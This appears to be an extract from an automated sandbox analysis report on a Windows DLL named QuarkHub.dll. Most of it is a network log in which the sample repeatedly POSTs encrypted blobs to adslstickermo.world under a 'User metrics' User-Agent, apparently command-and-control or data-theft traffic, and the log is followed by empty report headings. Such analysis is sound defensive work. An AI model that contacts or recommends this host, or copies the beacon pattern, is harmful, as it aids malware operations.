2024-01-03 17:26:28 UTC	576	IN	HTTP/1.1 200 OK Date: Wed, 03 Jan 2024 17:26:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vmJBqsqUD1EdeZFGymNaJV8BESUHZZC%2FUh05CCJWuu4vCvhdlP%2BVSiFjxPAV1yQWw0XiZMpX3bk4sV6pgK1yW0qkwOqLUy0iCMQIDc%2FUSuyxuYKEOfqMzLoTqteK1sWHsFKbf5aT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83fcf26678cd3462-DFW alt-svc: h3=":443"; ma=86400
2024-01-03 17:26:28 UTC	793	IN	Data Raw: 31 38 38 35 0d 0a 2d 20 1a e2 bf ec df 11 c1 b8 7a 3a 2c b1 db 8c 53 66 05 11 18 8e 31 13 c8 f1 2a fa a0 12 6d 58 c6 3a 22 fa ee a2 06 7a e3 79 ce 44 13 92 b8 0b c6 17 e2 a5 0b bf df b2 db f5 15 d9 59 ac c8 2d 42 2c 2c 88 41 a0 be 1a ef 1d 4f f0 89 c6 11 02 47 71 ee b2 58 63 44 6e ab e3 90 c8 60 77 54 80 f2 34 32 9f d7 17 d6 98 e8 f5 c8 6c 49 18 e4 ac 76 b6 09 e5 bc 9b ae 77 05 d5 75 95 e5 a3 52 c8 62 d7 6d e9 fe 2c 0a 38 6d 18 8a c8 c4 4c a1 40 ed c1 8b 70 bc b4 88 18 59 69 68 b8 65 74 e6 60 5b 79 e1 26 83 6f 1b 93 59 0f d4 b0 a4 59 af 2e 51 33 ee 3a b9 5e 6c 44 8c 2e 9c c8 5e 17 22 6e 03 08 0b 1e 10 dd a0 60 7d b8 de 25 86 ec be e1 68 c2 4a 5f 5b 54 ee f7 ef c8 84 84 99 49 9f 2f 01 54 f2 2a 8e 11 ae 14 a0 6d 2b 01 a6 b9 a8 92 1e 10 a7 d0 69 07 ab d1 25 Data Ascii: 1885- z:,Sf1mX:"zyDY-B,,AOGqXcDn`wT42lIvwuRbm,8mL@pYihet`[y&oYY.Q3:^lD.^"n`}%hJ_[TI/Tm+i%
2024-01-03 17:26:28 UTC	1369	IN	Data Raw: 8b 86 8b 60 34 84 9b 88 60 f0 0f 0c 7e 9e 6c 96 04 4a a0 28 1b 74 13 52 fa 04 e7 07 43 03 55 3f 34 16 bb ed 35 b6 7f 24 75 34 aa 27 9d c6 a3 5c b5 f1 50 ec eb f3 94 cc 09 fc 8e b6 01 14 7e 8d 38 89 f3 98 57 e9 17 1d 22 a8 f3 34 b6 d2 c5 eb 6e e3 ce 84 23 5d 7a ba 00 c3 00 86 17 8d 29 15 97 fd dd 35 25 fd 12 96 96 52 12 5a e7 32 ef 02 5f dd 7c b8 05 e2 d6 5b 6a 93 9f ee 81 c2 34 dd 22 ae 3d 65 c4 76 b4 95 cf 58 7d df 16 14 73 e0 31 ea be 64 54 cb 45 99 51 43 5e 25 82 d0 62 67 e8 6f bc 75 05 be 54 0d 41 f9 c9 6c 26 50 b5 16 93 7b 45 49 7e 30 ca 44 29 c9 95 87 86 98 f3 1b 7e ac 64 8b 82 13 0d 33 7c e0 61 b4 4c c3 94 68 9e 3a 28 e2 dc 04 4d 69 27 2f 3a 27 94 c7 38 e2 70 81 f7 1f e4 fe 34 8d 86 d0 a5 91 82 89 f5 3d 1c 7a c2 b8 54 d9 ae 92 2b 54 aa bb 6e 1a ac Data Ascii: `4`~lJ(tRCU?45$u4'\P~8W"4n#]z)5%RZ2_\|[j4"=evX}s1dTEQC^%bgouTAl&P{EI~0D)~d3\|aLh:(Mi'/:'8p4=zT+Tn
2024-01-03 17:26:28 UTC	1369	IN	Data Raw: 14 bf 8c c2 9e 87 10 f8 fa 90 c4 22 da db 0a f3 09 9b 1e 0e 96 fb ea 1f d4 81 86 90 e1 54 39 68 3c f8 bb ed 9d f7 3d c9 44 bc af 6a 4a fc 76 41 b6 68 9b 35 f4 61 be 37 86 1d 2d 7a 1b 97 d1 95 df fb 99 a2 f8 4d 90 ff 56 25 ff 3c 9d 1e 36 30 3a 1e 12 89 19 c6 a1 ba a1 2b 8a 5a 8e ad a0 b9 57 f0 61 ad 33 38 b7 9c 0f cc 58 a5 6f c4 b2 b8 d3 74 cd 83 fc 20 a3 b9 19 b5 18 a1 15 6e 15 e3 3e aa a4 0b d2 33 17 08 be a4 f1 c7 b9 65 18 ef c4 19 41 31 a7 77 eb b6 8f 4f 2d ac 54 86 5e 1f 2f ac de 09 cd e0 42 aa 97 a7 77 37 4e 36 27 ff 36 13 e1 c6 e1 4a 45 23 96 23 2a 59 e3 44 33 5b 33 f9 d8 0e 49 09 ac a1 c6 a4 b6 ca 35 9f 04 2f 87 f2 21 73 e3 0f fa 05 e3 4e 0d 6f bc 96 b2 83 40 ca f3 2d fd f4 1b 35 b4 76 01 18 77 cb 9f b9 16 c2 56 ec b4 22 c6 23 18 d7 ec b8 d8 01 2b Data Ascii: "T9h<=DjJvAh5a7-zMV%<60:+ZWa38Xot n>3eA1wO-T^/Bw7N6'6JE##*YD3[3I5/!sNo@-5vwV"#+
2024-01-03 17:26:28 UTC	1369	IN	Data Raw: 20 5a cb c6 e3 a3 3c 95 0b 5b 6b 0a 15 96 85 bb 82 89 f9 7e 2c a1 14 d6 d3 d7 d2 8c 87 df 4c 18 62 74 d8 ef 60 8f 5f 77 6b 71 1b 98 38 0d 9b e5 90 e0 06 3d a5 e5 36 8b 27 23 90 11 48 7c fc a5 00 41 c5 86 63 fb 46 9a 5a e8 23 75 75 77 c7 1b 35 6a 3e 12 d6 bc 4e c8 c3 9d 8c dc 54 cb 3f 64 b9 39 8d 7f cd f1 3c 16 a9 21 eb 54 8b 4e 4d fa 72 2c 2e 84 01 d7 24 b4 b7 7d 71 42 12 08 99 05 51 da a8 40 c1 1b 21 83 cc 9d 22 9c 58 0d 5d 94 e7 38 5b 44 c7 cf f1 13 cf ec db d4 78 71 33 d9 13 3a 37 fd d8 c3 84 b6 21 a4 ad 9d 8a d7 08 54 37 7f c5 dd 17 e0 c3 f2 1d 88 bc 3a b2 3c f5 4a 9b 81 70 27 22 4a 73 6c 28 5d 5c 56 bf fd 48 26 f7 c5 8c 28 1d 11 f6 bc ec e0 d9 6a 56 e0 55 50 aa 23 b2 b0 02 17 42 2e 3c 45 93 98 92 08 7f a4 64 da 6e 25 f1 5e 95 7d 52 32 72 f6 d4 1e 7f Data Ascii: Z<[k~,Lbt`_wkq8=6'#H\|AcFZ#uuw5j>NT?d9<!TNMr,.$}qBQ@!"X]8[Dxq3:7!T7:<Jp'"Jsl(]\VH&(jVUP#B.<Edn%^}R2r
2024-01-03 17:26:28 UTC	1369	IN	Data Raw: 44 51 e8 a3 57 04 f4 37 2e b1 26 fc ea 0d 27 00 cf 2b 86 d6 b1 b7 9a 2f f2 8e 42 f2 35 18 a5 db 83 0b bb 15 06 b5 56 b9 4c 99 b3 1b e1 98 e5 43 5f 16 32 05 99 fc f2 e3 d0 f4 07 68 dd 0d f2 6a 48 d4 05 5a 2f dc fd 33 41 af 42 80 7d d1 41 f1 49 dd cb c9 50 b3 4a 02 f8 bf 6e 74 70 2a c1 7b 81 0e 79 2c 8b ee bc ed 01 7f 45 38 80 40 68 53 aa d3 1e f7 1e 76 57 a1 d8 31 f2 f1 47 97 45 e8 26 c2 7d 3a f5 e1 bd cb e4 b8 2a 6b 9c e1 41 43 f3 c2 09 36 ab 2e b5 ca d2 eb ba 0e 3d 14 63 04 da 22 6a ff 6b 9e 90 d4 3f c0 0b 32 57 cd ec ad f0 a8 e4 11 bc 2b c5 39 51 5b 34 80 8b dd be ee dd 2a 3e ed f1 75 72 01 88 b7 a1 02 f4 67 3a f8 6d 54 5c 64 20 33 5b ce d4 a8 f7 d1 cb 7c f7 18 7e c5 b1 d7 d9 a1 0d bc 82 75 51 34 48 90 40 33 4a fe 4e ff ab ee 75 5f 9b 65 0f 51 a7 4e 70 Data Ascii: DQW7.&'+/B5VLC_2hjHZ/3AB}AIPJntp{y,E8@hSvW1GE&}:kAC6.=c"jk?2W+9Q[4*>urg:mT\d 3[\|~uQ4H@3JNu_eQNp
2024-01-03 17:26:28 UTC	16	IN	Data Raw: 2b 4c d3 70 56 83 3d 91 59 49 d3 88 91 47 0d 0a Data Ascii: +LpV=YIG
2024-01-03 17:26:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-03 17:26:29 UTC	151	OUT	POST / HTTP/1.1 Accept: / User-Agent: User metrics Host: adslstickermo.world Content-Length: 4561 Connection: Close Cache-Control: no-cache
2024-01-03 17:26:29 UTC	4561	OUT	Data Raw: 80 6e c3 bb f5 eb 86 b3 0b fe 9a 0f 72 97 ef 79 10 5e e5 e3 74 48 7d bf cd 02 4b a8 04 2b 04 aa 46 d7 72 bd 2a 91 f9 0e 78 a5 dd 44 3d 09 7a e7 b9 d2 be 25 21 f8 0a 80 5c 93 eb 33 da 08 47 e5 60 e6 0a 8d 8c 3a ed f3 92 87 31 63 fc 4f b9 75 04 8f a8 7d c1 ea c5 1c 2a e7 c0 7c 1f 3b b1 e9 59 d9 b7 b5 d0 c9 68 fd 06 9b d1 f7 87 67 5e 9d c5 bf 6d 82 f9 b0 e0 7d 84 54 3b d1 aa 40 ad 0d db 56 04 09 49 92 6a 3a 7d 40 26 dd 71 41 7e eb 28 55 ed 5b 99 a9 6d 98 f5 0f 33 ab ed 4c 4f 10 54 d8 00 a2 69 79 2e 59 22 6d f2 8e 31 da 68 27 1c 31 fc 22 95 51 5e 82 7c b7 39 8a 12 fe 28 a6 2b 6c 30 98 52 2d 53 df b9 da 4f 1b 9a 3d 1c 8d 8b f7 b3 cf 9d f2 cf 09 39 9b d5 3d 7b bd f4 5f 44 ba b8 dd a1 11 55 a8 38 e6 06 55 8d fa ad 92 f6 cc c7 e2 ea 76 36 7e 4b f9 f4 3b f5 5e 30 Data Ascii: nry^tH}K+FrxD=z%!\3G`:1cOu}\|;Yhg^m}T;@VIj:}@&qA~(U[m3LOTiy.Y"m1h'1"Q^\|9(+l0R-SO=9={_DU8Uv6~K;^0
2024-01-03 17:26:30 UTC	582	IN	HTTP/1.1 200 OK Date: Wed, 03 Jan 2024 17:26:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NDSREwonh8y24mx41T7oABfERCqeqMukaxRbz%2BZgHNFnCBkYF0zKKUB%2FRUpeoW4FyAO8OxXXQ3IIGPzmoYHaSAwXFRBn7WgCh8ytJ7m%2F%2F0%2Fqlsl7eCQYudT22o%2BXExrVE7gOS4gx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83fcf2728b6de966-DFW alt-svc: h3=":443"; ma=86400
2024-01-03 17:26:30 UTC	787	IN	Data Raw: 31 38 38 35 0d 0a f8 f1 b3 1c 39 ee 97 a7 23 82 f8 fd 6e 9a 3d a9 8e 1a b0 3d 2b 12 d6 23 4e b4 88 10 5b fa f9 a6 91 e3 78 47 d4 35 fe 24 79 9b 29 58 97 e3 12 8f ac 8d 40 9e 29 ed e2 3e c4 0f 81 32 ae 42 94 1a 6a 0a 56 ff 12 4a 34 b8 da b9 2c 78 f9 5e 7f ee ec 90 d4 a8 e4 a0 9d 5b 43 c6 88 60 ee 28 61 ca 1d e3 e1 84 ad 5f 4c 9f 6b cd 48 20 f8 df ee b8 bf e4 de c9 eb 12 2a 07 0d 9f ff 43 39 49 46 f8 a6 90 cf 48 ff 68 6e 09 ed f9 ca de 2c ba f6 7f fe f8 fb 39 bd f5 f2 ef fd ad e4 cb ec 6c 61 69 7a 80 22 31 9f b0 45 e0 99 74 bc a2 d0 f8 d8 29 51 a1 3e ed bc 58 a0 f1 5e 7d 97 fa 45 22 e1 cf 02 a1 95 c4 9a a6 55 91 6b 04 eb f9 73 13 c7 ba 88 88 9b 49 96 3b 99 85 6b f4 0c 4a bc a9 82 aa 83 d2 ee 50 06 79 12 ef eb 31 a7 bc a4 df 01 a3 b7 58 cd 4f f8 cf f1 e1 b7 Data Ascii: 18859#n==+#N[xG5$y)X@)>2BjVJ4,x^[C`(a_LkH *C9IFHhn,9laiz"1Et)Q>X^}E"UksI;kJPy1XO
2024-01-03 17:26:30 UTC	1369	IN	Data Raw: 1c e2 48 83 67 4e 18 37 84 32 63 41 d2 46 3a 56 5a 7b 3d 1d e8 88 b2 7b ca 89 93 da 45 7c fb 3e 43 7b 63 2e d3 f5 65 bf 1a 19 43 c0 ac 80 ed c7 50 1f 1c 2a 68 37 16 6a 17 93 c4 c2 31 c5 f9 c1 03 0c 5f 63 99 02 bc 81 7b 71 5b d3 ba df c1 c4 27 bc c4 45 79 06 8d b3 e1 fc 38 a5 44 7f 9c b6 f9 e3 0e 4f 88 59 67 29 fe 01 3e ae 43 fb 0a 64 46 1d 01 f0 60 6d 0f 0b 57 d4 6e f8 01 5d be af d3 03 79 84 82 89 dc 28 52 cf 8f 3c 75 37 da 12 c0 a7 9a 61 8b 25 df f6 f9 cf dd 96 76 fe 59 73 9d 95 69 d8 a6 0d f0 b0 e8 cd 9b 7e 92 01 1d 1b b1 d3 4e ec 43 98 c4 6d d2 69 02 dd 61 1b 5a 31 3c ea 71 7f 05 06 d4 a7 ff 4d b4 00 f2 bf c2 a4 30 ad 5f e4 cc a5 9b 5d 3f 1b 01 a3 7f 47 e5 38 57 c9 e0 bd 0f 76 68 62 ca 6b 11 b6 84 e8 bc 92 fc 3b 1c af a5 42 80 6d 2e 48 55 d2 e2 c8 75 Data Ascii: HgN72cAF:VZ{={E\|>C{c.eCP*h7j1_c{q['Ey8DOYg)>CdF`mWn]y(R<u7a%vYsi~NCmiaZ1<qM0_]?G8Wvhbk;Bm.HUu
2024-01-03 17:26:30 UTC	1369	IN	Data Raw: 9a 2b 98 ab d2 e0 69 82 5a c0 ed 3b e7 e7 cb c5 5c 0d 83 b2 97 7f 31 18 da 1e 54 72 89 51 85 d1 61 1b 8f 30 40 26 20 88 fb 93 2f 02 82 be 9d 2f 74 19 8f 47 0f 81 f1 74 7f f9 58 4e b9 c9 74 1e 3c 6c db 23 c3 fd 1f d8 37 cf e5 47 9a bb cb c1 86 fa 19 0a 29 38 55 12 c8 15 84 45 e2 17 a6 61 7e d7 1d b2 f9 d3 74 08 59 e0 82 2a 4f 55 6c 29 f8 f9 9a 82 02 70 00 f1 31 b4 79 7d 38 ce a0 aa d6 82 6a e6 8d c1 a2 be 5d d4 cb 70 b0 13 74 9e e3 18 87 42 25 16 57 56 8c 75 f0 a7 e0 60 88 06 5a 28 46 55 6b a1 76 3f 0a 7f 75 55 01 4e 1d b7 af 0e 12 ad 5f de a4 34 6e db 58 b6 9e 36 47 a3 5e a3 4f 25 bc 34 17 7e 93 db 69 f6 17 eb d4 df 48 f8 72 95 c0 29 1f c8 f0 3e 29 6d a4 86 9c f6 ef cc 2b ef dc fb 63 77 3f c4 84 5b 0b fa 9d 45 55 e8 38 f9 e4 d6 ae 43 0b d4 24 27 63 1e 62 Data Ascii: +iZ;\1TrQa0@& //tGtXNt<l#7G)8UEa~tY*OUl)p1y}8j]ptB%WVu`Z(FUkv?uUN_4nX6G^O%4~iHr)>)m+cw?[EU8C$'cb
2024-01-03 17:26:30 UTC	1369	IN	Data Raw: 7e 30 76 40 51 91 d5 63 85 f8 f7 f2 73 fe 75 49 3c 66 45 07 b0 8d 52 95 28 c6 49 f3 d1 18 c1 03 dd ca 98 32 b0 1a 34 ac 8e ad 5c 96 55 81 a8 15 b5 10 bc 55 ec 27 db 59 b6 73 80 87 ed bc 4f f3 1f 79 12 85 b1 94 33 2c bb 85 0d 7e 99 a6 d5 9e e9 2d c0 b2 0b e2 c1 23 50 b5 cf ab 42 54 bf f9 08 94 91 18 10 f4 d0 52 3a ac fe e6 c7 a1 72 96 04 03 7d 20 08 af f4 f3 5f 72 57 18 26 bc e3 ef ba d0 56 8a 0f b1 59 c4 b9 d8 a6 d0 b1 39 f2 29 3d 82 d1 4a 75 70 4e d0 1d cc a4 3f 7c 99 04 ae b1 48 55 ca 02 3b d0 74 76 99 cc fb c0 a0 a1 44 ea b8 33 e4 a3 72 9d 24 b1 e4 0a a7 2a 52 3c d9 b7 f4 17 c9 98 be 14 e0 ad fd 1d 47 b8 69 07 31 8d 56 4e b4 5b 8b 42 b5 b3 29 9f d2 32 ea b2 20 ad 07 13 f4 95 9f 51 e3 e3 aa ed 22 2a 91 da 4d 59 b6 68 2c bb 91 98 2e a0 a5 02 d9 51 87 bc Data Ascii: ~0v@QcsuI<fER(I24\UU'YsOy3,~-#PBTR:r} _rW&VY9)=JupN?\|HU;tvD3r$R<Gi1VN[B)2 Q"MYh,.Q
2024-01-03 17:26:30 UTC	1369	IN	Data Raw: df 63 b7 70 18 64 62 a8 15 1e 9f 00 52 b9 af e3 f4 73 0a 1a 28 c6 ae b7 1a c4 3b a7 6a 2c 99 9b f0 4f a8 d4 b7 6d b0 0a 54 f2 cb fb 46 b9 94 85 23 5a db 76 b8 e1 ff 8a b0 e9 4e ee a0 90 97 b1 cf be 5f 14 09 2d a6 03 e3 f4 b9 f9 1e 82 9f 01 fc d3 7e 5f 19 26 cc a6 00 78 0f b6 51 70 25 96 05 22 86 b8 ff d7 9b 21 f7 c5 54 27 89 58 18 23 ae 4f 2e 6d 37 dc 9f 0f 36 65 c0 ae 95 a6 a3 aa 51 74 43 b8 d4 ea 80 4e 4d f2 1e f7 0e 81 8b 0d 9f bb f6 4e e1 20 f8 fb 21 6c 9a a2 c8 da c4 d9 3f 15 f6 80 7d 66 34 d0 c2 88 85 11 ac 80 a6 0e c6 8a 29 34 f5 67 56 e0 b0 df 9b 22 89 fc f2 62 fd f9 79 c2 3e 2d 8f 40 10 f1 4d a2 e5 27 f6 7f 16 bc 6c a3 a1 d6 20 33 5c 32 43 02 f4 0a d3 49 4e 34 ff d7 48 b9 55 64 f6 e6 c4 cd 10 ee 48 18 2e d1 00 67 2b 6a 82 c9 5c f7 7f 6f 51 04 fe Data Ascii: cpdbRs(;j,OmTF#ZvN_-~_&xQp%"!T'X#O.m76eQtCNMN !l?}f4)4gV"by>-@M'l 3\2CIN4HUdH.g+j\oQ
2024-01-03 17:26:30 UTC	22	IN	Data Raw: c8 7c da 6e f3 90 b9 a0 93 b9 6a 35 56 ed f1 89 80 a5 43 bb 0d 0a Data Ascii: \|nj5VC
2024-01-03 17:26:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-03 17:26:31 UTC	151	OUT	POST / HTTP/1.1 Accept: / User-Agent: User metrics Host: adslstickermo.world Content-Length: 4561 Connection: Close Cache-Control: no-cache
2024-01-03 17:26:31 UTC	4561	OUT	Data Raw: 2d 66 3e 76 37 5d bb 84 61 6a 64 60 a8 99 0e 97 3b ff 50 60 92 4a 75 2f 8b f3 1f 58 1a 78 ed 29 1a 5a a4 51 2b 11 ba 78 8c ae a8 00 bc 7a 72 fa 08 24 6a 5a 76 13 42 a0 33 b8 31 69 59 d4 e4 26 1f d7 2c 09 5a 87 eb 9f bb 43 44 54 d7 41 38 59 ba 68 b5 5e 99 8e bb 6e 53 a9 7d 04 98 fd 7f a3 f7 b8 5d 4a 25 af 13 92 92 d6 de af 5d 68 b2 47 2d f3 b2 c0 5e 50 e4 be 2f 10 87 0b d6 32 1c 0d 22 d0 63 1e 2c 47 61 78 a7 86 70 70 9d 6c f2 0e 7c 56 d0 94 3d dc cf 2b 48 92 02 9e de d3 9c 12 39 46 58 55 e9 39 2b 0a ad 8d 1d be c8 c3 2b 93 6b 03 ee 1f 3a 52 21 d0 b7 db f7 1d 8a cf 08 27 61 9e cc 19 e8 7e c4 eb 14 fd 23 b6 76 af e7 c7 db 03 85 5a e3 4d b3 f2 ee de 46 d5 df a5 87 06 d7 2d 3a 82 7e 77 6e 86 1e 32 d7 6b c2 e2 96 a2 0d 13 77 bc 4c 15 72 18 99 fa 94 34 4f 91 eb Data Ascii: -f>v7]ajd`;P`Ju/Xx)ZQ+xzr$jZvB31iY&,ZCDTA8Yh^nS}]J%]hG-^P/2"c,Gaxppl\|V=+H9FXU9++k:R!'a~#vZMF-:~wn2kwLr4O
2024-01-03 17:26:31 UTC	580	IN	HTTP/1.1 200 OK Date: Wed, 03 Jan 2024 17:26:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=870NPYlZ6m8w%2FeVvY87queMbATM%2F5delF7b%2F0hLlDoYA1%2F7QAbc2P6yWpcldtx7836AAM1UUFV02EEmhjsnOl2gGUFYLoGzJQq64Vsd1824HUZ26aJvtS8hEKg3%2B5JJClsc1gmXQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83fcf27e7c342e22-DFW alt-svc: h3=":443"; ma=86400
2024-01-03 17:26:31 UTC	789	IN	Data Raw: 31 38 38 35 0d 0a 90 6d 3c 92 80 8f cb e9 d7 06 4c 1c 84 6b 8a d5 1f e6 a6 e1 9c 74 67 83 e0 3a aa 36 7b 76 39 b7 ef 6e 33 a3 47 66 e8 64 e5 68 d5 7b 7d e9 42 28 c8 ac 41 b0 95 fd 8e 7f 1c 70 5c b6 25 60 a7 88 33 eb b9 6d bb 0a b0 9f 64 8d 53 c6 06 df 97 b7 af 77 f1 2e 89 0c f2 b3 87 90 08 9b 59 23 01 80 9d 67 70 c8 61 2a 64 a2 5e 0a 8a 0d a4 d4 c6 9b 57 28 7d 84 5e 62 7d 72 cc 8f 8c 5f 90 95 8e f8 76 8d 50 8b 56 75 57 9b ed a5 cd 21 b1 aa 11 55 93 bc b5 e8 20 6d f5 eb e1 e5 45 02 36 33 99 96 6d 70 92 76 d3 0d 65 a9 f4 64 95 7a 8a 85 20 e7 88 2e 48 d1 a3 64 ca c7 f3 49 ab e5 37 f3 06 4e 3b 23 09 5d d9 4c 39 c4 70 c1 6d 16 5f 6c 84 92 65 4c 68 ac 64 ee 76 54 54 d1 6d 6a fe c9 9a 14 bf ca 3d 0a eb 43 c0 e8 6d ff 1d 0d 45 90 ab b2 f7 c5 a2 ee 91 66 58 17 df Data Ascii: 1885m<Lktg:6{v9n3Gfdh{}B(Ap\%`3mdSw.Y#gpa*d^W(}^b}r_vPVuW!U mE63mpvedz .HdI7N;#]L9pm_leLhdvTTmj=CmEfX
2024-01-03 17:26:31 UTC	1369	IN	Data Raw: 4d 94 dc df 9b ca 12 b0 38 24 ee ca 80 24 43 85 70 33 7a e9 8a 64 b1 c3 3c 2b 53 df 3b 31 aa 2f c1 44 b9 18 5f 80 ec 9b 0b 54 b4 ee e7 98 cc 25 1c 2a 77 5b 0b 83 98 3e eb aa f5 ec d7 71 d8 10 e7 71 c7 fe a3 e9 78 d2 76 aa e8 e4 54 c6 c9 4a 30 0f ab a3 45 b6 64 81 87 18 30 eb 64 0b ec a2 f3 d8 2c b4 2c 81 61 7f de dd d0 ba 32 72 de 7e 43 39 6d c5 fa be c3 22 f3 21 2c da 8e b0 d2 93 1c a3 49 10 44 fd 35 65 58 cf 0d b0 65 ac 9f ae c1 fb cc e7 f7 49 be 7b e9 dd 41 65 8e 02 cf 3a cc f7 fb 6d df 38 11 bc 11 46 bd fe 05 90 55 f7 58 f5 e5 50 6c bc 3b 5f 0a d4 5d 28 96 df 69 9c a7 34 e3 4e 4e 35 26 fd 31 0f 34 f2 52 fe 8a b9 59 6c ae c5 2d 80 4e 66 cb 88 ed ab 89 37 b7 94 4c 4a 41 82 1f 39 3f 55 5c 48 dd 34 0c e2 55 e2 1f da 11 cf 76 d0 f9 76 ff e1 a8 58 6d 18 bd Data Ascii: M8$$Cp3zd<+S;1/D_T%*w[>qqxvTJ0Ed0d,,a2r~C9m"!,ID5eXeI{Ae:m8FUXPl;_](i4NN5&14RYl-Nf7LJA9?U\H4UvvXm
2024-01-03 17:26:31 UTC	1369	IN	Data Raw: cf c1 dd a7 f4 9f 14 56 95 62 34 df 5e ca cf 0e ea 17 53 f7 e6 f7 3a 20 6f 68 64 53 f6 fb 71 d8 6a 02 bb 05 04 2e b1 13 e3 59 f9 f3 d2 54 6f 7b 34 df 85 9e b6 ae f8 41 7c 81 0c b1 3f e1 1c 8b fa fb 71 8a 6d cd f1 4b d6 0b 87 69 06 c4 09 df 2e 57 f3 bd 2e 43 0d 9e f0 53 c5 07 50 55 0d 81 bd a7 12 d1 c6 29 78 0c 3d 4a 26 65 e4 8b ce c7 56 e3 2a e3 f6 f9 56 de 29 9b b6 cd f2 8e 97 03 dd da aa 32 fc ce 6e f3 d3 cc e3 67 39 9e b0 4f be 64 5f 36 79 29 00 d4 f2 80 88 62 3a d2 66 95 85 8e dc 7b f9 26 aa 67 87 14 2c ee 2a df da 5c d7 12 5a f4 96 71 e0 4d 3a 03 97 5d b4 11 4c 74 60 d9 35 e3 76 d5 98 f0 d0 cd 6a 6a ce d2 e9 29 e1 3c 5c 16 d6 b9 eb 9a 09 f3 ec 2a 3f 97 df 37 74 d3 20 2a fc bf 11 8c e5 86 30 9c 89 14 09 f9 00 8e 88 45 dd c7 38 01 fe e2 cf e6 3f 2c 8b Data Ascii: Vb4^S: ohdSqj.YTo{4A\|?qmKi.W.CSPU)x=J&eVV)2ng9Od_6y)b:f{&g,\ZqM:]Lt`5vjj)<\?7t 0E8?,
2024-01-03 17:26:31 UTC	1369	IN	Data Raw: cf 25 8a df f7 69 c6 c2 74 18 c5 67 df 9e 8c 94 b0 a6 7e af a0 b7 b4 a6 23 e7 67 b9 3a 0b ae a8 33 6c 6f 6d 32 5b 96 46 9e 58 1c 6e c9 b9 6b eb a4 48 9c ec d5 b5 96 94 34 dc 03 f6 ed 51 5a c6 f6 d3 c4 c2 29 85 cf 37 c6 f8 d9 0d a3 f3 e7 dc 0c 82 54 b5 a7 45 f4 97 c2 90 61 67 74 fc 6d e9 e9 c6 dd 74 dd 1e 9d 72 4e 43 f9 bc 84 3f 78 45 a2 8f 11 57 45 95 6c cd 8e e8 e5 24 d5 ba fa 7b f4 6f 8a 45 6c 11 71 2a 60 ff 84 32 bc 48 02 57 ac d4 7c ec 43 09 8f bc b7 88 84 71 11 a4 02 2d fe 57 1e 34 48 f2 be 64 b1 91 be 2c 1d 69 00 35 fd 75 7c 2d 3c 68 8b 67 fb c3 9b 2f 2a 9b 18 98 3d 56 54 22 70 8b e4 26 d4 0c d8 20 ca a5 f8 bc 25 33 2c b1 58 f9 99 52 1d a1 2c 5d 61 97 26 ec 5b a0 0c 6b 82 c4 70 10 02 5d cf 8f ea 65 9c da d7 d1 e4 3a 15 9d 96 8c 43 af d3 d2 64 1e 60 Data Ascii: %itg~#g:3lom2[FXnkH4QZ)7TEagtmtrNC?xEWEl${oElq`2HW\|Cq-W4Hd,i5u\|-<hg/=VT"p& %3,XR,]a&[kp]e:Cd`
2024-01-03 17:26:31 UTC	1369	IN	Data Raw: 5d a5 2b 43 06 17 b2 fe d0 a0 db ef 19 bf 94 27 47 db 6e 09 46 d6 fd 2e 2a 26 4b 34 9c 0c 39 b7 a9 e5 c7 96 18 cc 50 cc 5e 46 95 f6 35 28 0f 5c 89 b5 b2 05 16 72 91 65 a3 d3 17 e2 c0 20 52 21 86 24 ad 7e 5b c3 48 9a 29 6f dd a2 b0 34 36 00 a5 0f b1 8d 2f 53 35 a0 cd 90 f6 92 da 84 48 3d 9e 35 7a 3b 4b a6 de 7b 09 60 7b f5 04 b4 e5 a1 d6 bf f3 09 4f c3 da f3 8a 09 6e 36 b9 15 08 43 76 4a b5 24 ff 9d 2c 55 24 b2 24 d5 a0 79 32 79 62 c7 c3 6a 47 e1 49 f6 60 4b b0 2b 73 85 1c 6b 7e 1f c8 f3 12 9d 12 e9 b6 9b b9 4a cb 10 34 3d 03 88 c2 ba 23 04 74 ea 9a d8 aa b6 62 2d ea 15 f9 e3 3b 5e b0 d4 f0 86 85 35 f7 6b 96 00 e6 fe 74 5b 3d a6 fa d9 82 f1 a7 33 76 3b e2 b2 7c 69 61 42 4b e3 e3 d4 67 89 b5 0a df e4 3b 71 27 85 48 84 31 89 47 51 35 eb de 8a 05 df 9f c9 d0 Data Ascii: ]+C'GnF.*&K49P^F5(\re R!$~[H)o46/S5H=5z;K{`{On6CvJ$,U$$y2ybjGI`K+sk~J4=#tb-;^5kt[=3v;\|iaBKg;q'H1GQ5
2024-01-03 17:26:31 UTC	20	IN	Data Raw: b2 f1 3b f1 7c 56 60 86 4c 31 81 46 3c ab fb 00 48 75 0d 0a Data Ascii: ;\|V`L1F<Hu
2024-01-03 17:26:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QuarkHub.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Compliance

Networking

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

